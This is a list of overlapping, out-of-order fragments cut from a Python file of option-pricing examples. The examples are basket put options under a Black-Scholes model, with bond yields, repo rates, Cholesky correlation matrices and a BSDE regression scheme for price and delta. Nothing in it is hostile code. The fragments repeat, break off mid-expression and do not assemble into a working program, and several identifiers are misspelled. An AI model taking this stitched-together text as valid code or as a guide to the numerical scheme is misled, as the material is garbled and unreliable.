[ "0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float)", "np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate =", "expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ +", "for the BSDE. .. todo:: Moving the numerical scheme to the function file", "0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets,", "2018 @author: <NAME> This file holds the parameters for all specific example and", "self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient,", "rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate *", "k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 -", "rec # Reference Solution reference_riskfree = False refererce_adjust = False # Under development", "= 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis,", "* np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\", "= 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock", "(1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar +", "self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) *", "1. self.put_call = \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\"", "- self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1", "(1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t", "= 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model =", "self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp", "= 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension,", "-> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta", "self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t *", "1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate,", "adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :],", "functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order =", "* theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield -", "* np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse,", "= 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self,", "self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75", "/ (1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis,", "price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm", "model\" self.dimension = dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield", "- theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield -", "expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij,", "derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i", "0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse =", "- self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] *", "riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate", "riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec", "self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value", "= np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets,", "derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] =", "Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate", "= False # Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters", "riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0", "delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis,", "+ self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp =", "0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84,", "6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return", "reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self,", "regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "put option for BS model\" self.dimension = dimension # Market parameters and functions", "* theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative,", "i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for", ", regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis,", "np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float)", "the BSDE. .. todo:: Moving the numerical scheme to the function file \"\"\"", "0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05", "This file holds the parameters for all specific example and the numerical scheme", "num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar", "Information self.name = \"Arithmetic basket put option for BS model\" self.dimension = dimension", "Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order", "0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float)", "Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0.", "(1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\", "delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta,", "range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in", "counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 *", "\"Put option for a 5 stocks German index model\" dimension = 5 #", "for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference", "= adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price =", "self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i, ji, jk,", "= 1. buy_sell = -1. put_call = \"Put\" # Regression functions and parameters", "delta_t * theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield", "* theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight", "\"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression = 1 +", ", regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield +", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0,", "* np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call", "0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse", "expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price", "self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis,", "rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False", "i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) *", "self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate *", "np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439,", "the parameters for all specific example and the numerical scheme for the BSDE.", "Information name = \"Put option for a 5 stocks German index model\" dimension", "reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example", "= dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate -", "= \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis =", "delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion:", "i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec", "dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\"", "= adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:,", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0]", "= delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i]", "refererce_adjust = False # Under development class GeometicBasketPut(): def __init__(self, dimension): # Market", "[0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions", "Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion", "ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket put option", "the numerical scheme to the function file \"\"\" import numpy as np class", ".. todo:: Moving the numerical scheme to the function file \"\"\" import numpy", "*\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield", "dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets", "delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis,", "np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix", "regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :],", "expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion,", "delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] =", "adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust = False", "[0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865,", "basis_order = 3 no_of_regression = 1 + 5 + 1 + 5 def", "adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :],", "ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield", "dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0.,", "numpy as np class GermenIndexPut(): # Example Information name = \"Put option for", "regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield", "expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t,", "= np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] =", "and the numerical scheme for the BSDE. .. todo:: Moving the numerical scheme", ":], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t *", "5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec", "- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm',", "(1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield -", "* np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight", "= 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value =", "Reference Solution reference_riskfree = False refererce_adjust = False # Under development class GeometicBasketPut():", "= 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623,", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 +", "Regression functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order", "May 14 17:21:26 2018 @author: <NAME> This file holds the parameters for all", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t *", "= \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression = 1", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1])", "np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight =", "self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1])", "scheme for the BSDE. .. todo:: Moving the numerical scheme to the function", "parameters for all specific example and the numerical scheme for the BSDE. ..", "rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False", "parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate", "delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples,", "theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse,", "1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0,", "regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield", "np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse,", "self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate", "theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "- self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)", "False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): #", "self.put_call = \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis", "delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/", "0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\", "= -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information", "self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def", "theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0])", "regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield -", "GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield", "0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0.,", "# Stock parameters self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets =", "False # Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and", "1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):", "terminal_time = 1. buy_sell = -1. put_call = \"Put\" # Regression functions and", "expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,", "+self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False refererce_adjust", "basket put option for BS model\" self.dimension = dimension # Market parameters and", "delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\", "1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec =", "sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2", "False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket", "\\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self,", "1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] =", "i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:,", "self.buy_sell = 1. self.put_call = \"Put\" # Regression functions and parameters self.sorting_method =", "+ self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate", "False refererce_adjust = False # Under development class GeometicBasketPut(): def __init__(self, dimension): #", "expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6,", "todo:: Moving the numerical scheme to the function file \"\"\" import numpy as", "= 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate =", "= adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec", "= 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate =", "self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta", "price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik',", "rec # Reference Solution reference_riskfree = False refererce_adjust = False Example = ArithmeticBasketPut(5)", "= False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension):", "expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta,", "\"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion =", "= \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ +", "[0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition)", "self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion =", "0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0.,", "1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0]", "3 no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples,", "divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0", "- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',", "class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06", "- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield", "self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t,", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :],", "+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\", "0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40.", "adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866", "rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7]", "0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters", "def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1", "self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)", "__init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0.", "3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta,", "i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree", "riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta", ", regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield +", "np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar =", "22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell = -1. put_call =", "40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" # Regression functions", "variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t,", "= \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1", "BSDE. .. todo:: Moving the numerical scheme to the function file \"\"\" import", "riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7,", "temp = \\ (1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij->", "\"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression =", "1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1.", "i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:,", "self.dimension = dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield =", "cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05 divident_yield =", "17:21:26 2018 @author: <NAME> This file holds the parameters for all specific example", "def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] =", "self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion +", "num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648,", "* (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) *", "np class GermenIndexPut(): # Example Information name = \"Put option for a 5", "Example Information name = \"Put option for a 5 stocks German index model\"", ":], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield", "40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta,", "= 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient,", "0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 